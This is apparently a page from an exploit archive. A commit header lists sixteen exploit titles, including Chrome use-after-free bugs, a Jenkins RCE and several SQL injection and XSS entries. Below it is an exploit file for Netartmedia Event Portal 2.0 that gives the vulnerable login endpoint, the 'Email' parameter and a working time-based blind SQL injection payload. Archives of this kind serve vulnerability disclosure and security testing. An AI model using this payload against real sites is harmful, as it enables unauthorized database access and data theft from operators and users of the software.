2afed97ceb
16 changes to exploits/shellcodes libseccomp < 2.4.0 - Incorrect Compilation of Arithmetic Comparisons Google Chrome < M73 - Double-Destruction Race in StoragePartitionService Google Chrome < M73 - Data Race in ExtensionsGuestViewMessageFilter Microsoft Internet Explorer 11 - VBScript Execution Policy Bypass in MSHTML Microsoft VBScript - VbsErase Memory Corruption Microsoft Edge - Flash click2play Bypass with CObjectElement::FinalCreateObject Google Chrome < M73 - MidiManagerWin Use-After-Free Google Chrome < M73 - FileSystemOperationRunner Use-After-Free Advanced Host Monitor 11.92 beta - Local Buffer Overflow Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit) TheCarProject v2 - Multiple SQL Injection TheCarProject 2 - Multiple SQL Injection Gila CMS 1.9.1 - Cross-Site Scripting MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting eNdonesia Portal 8.7 - Multiple Vulnerabilities Netartmedia Event Portal 2.0 - 'Email' SQL Injection Netartmedia PHP Mall 4.1 - SQL Injection Netartmedia Real Estate Portal 5.0 - SQL Injection
16 lines
No EOL
662 B
Text
16 lines
No EOL
662 B
Text
# Exploit Title: Netartmedia Event Portal 2.0 - 'Email' SQL Injection
|
|
# Date: 19.03.2019
|
|
# Exploit Author: Ahmet Ümit BAYRAM
|
|
# Vendor Homepage: https://www.netartmedia.net/eventportal/
|
|
# Demo Site: https://www.phpscriptdemos.com/events/
|
|
# Version: 2.0
|
|
# Tested on: Kali Linux
|
|
# CVE: N/A
|
|
# Description: Event Portal is a a web software (php script), that can be
|
|
used to create advanced and multi-user event listing and ticket selling
|
|
websites.
|
|
|
|
----- PoC: SQLi (time-based blind) -----
|
|
# POST Request: http://localhost/[PATH]/loginaction.php
|
|
# Vulnerable Parameter: Email
|
|
# Payload: '||(SELECT 0x59685353 FROM DUAL WHERE 7114=7114 AND SLEEP(5))||' |